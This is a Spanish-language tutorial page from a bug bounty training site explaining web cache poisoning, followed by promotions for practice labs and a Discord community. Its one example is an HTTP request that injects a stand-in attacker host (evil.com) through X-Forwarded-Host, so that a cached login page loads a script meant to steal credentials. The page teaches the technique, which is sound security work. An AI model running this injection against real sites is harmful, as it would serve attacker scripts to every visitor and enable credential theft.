Cache Poisoning

Alto

Web Cache Poisoning

Definición

Web Cache Poisoning es una vulnerabilidad que explota el comportamiento de cachés web (CDNs, proxies) para almacenar y servir respuestas maliciosas a otros usuarios. El atacante envía una petición con cabeceras o parámetros que no son parte de la clave de caché pero sí afectan la respuesta, haciendo que la versión envenenada se sirva a todos los visitantes.

Impacto

Cross-Site Scripting (XSS) masivo afectando a todos los visitantes de la páginaRedirección masiva a sitios de phishing o malwareDenegación de servicio almacenando respuestas de errorRobo de credenciales a escala mediante páginas de login envenenadas

Ejemplos

Cache Poisoning vía cabecera X-Forwarded-Host

La cabecera X-Forwarded-Host no es parte de la clave de caché pero la aplicación la usa para generar URLs de scripts. El atacante la manipula para inyectar su dominio, y la caché almacena la respuesta envenenada sirviéndola a todos los usuarios.

# Petición con cabecera no cacheada que afecta la respuesta
GET /login HTTP/1.1
Host: victima.com
X-Forwarded-Host: evil.com

# La respuesta incluye un script apuntando al host inyectado:
HTTP/1.1 200 OK
<script src="https://evil.com/static/analytics.js"></script>

# Esta respuesta se cachea y se sirve a TODOS los visitantes de /login
# El atacante controla analytics.js y puede robar credenciales

Practica Cache Poisoning con labs reales

Aplica lo que has aprendido en entornos seguros basados en reportes de bug bounty.

Ver labs de práctica
2.786

hunters entrenando

63

labs de hackeos reales

1.767

completaciones

$14.790

pagados por estos bugs

37 flags capturadas esta semana·Hackeos reales de HackerOne · YesWeHack · Bugcrowd·Sin permanencia·Academy gratis
Gratis · sin cuenta

La checklist que repaso en cada objetivo nuevo

47 comprobaciones ordenadas por coste: primero lo que te puede meter en un lío, luego lo barato, y al final lo caro — que es donde están los bounties grandes. Te la mando al correo ahora mismo.

Te das de baja en un clic, desde cualquier correo.

BBLabs · bug bounty en español

Deja de leer sobre bugs y empieza a cazarlos

Crea tu cuenta gratis y practica sobre labs basados en hackeos reales que pagaron miles de euros. La Academy es gratis para siempre.

Sin tarjeta · Academy gratis · cancela cuando quieras

La comunidad

Esto no es una plataforma con usuarios.Es gente rompiendo lo mismo que tú.

Dentro se pregunta, se enseña lo que se ha encontrado y se resuelve en grupo lo que atascaría a cualquiera solo. Se entra gratis: sin cuenta, sin plan y sin dejar el correo.

Entrar a la comunidad de BBLABS en Discord
Entrar al Discord

Es gratis y abierto. No hace falta tener cuenta en BBLABS para entrar.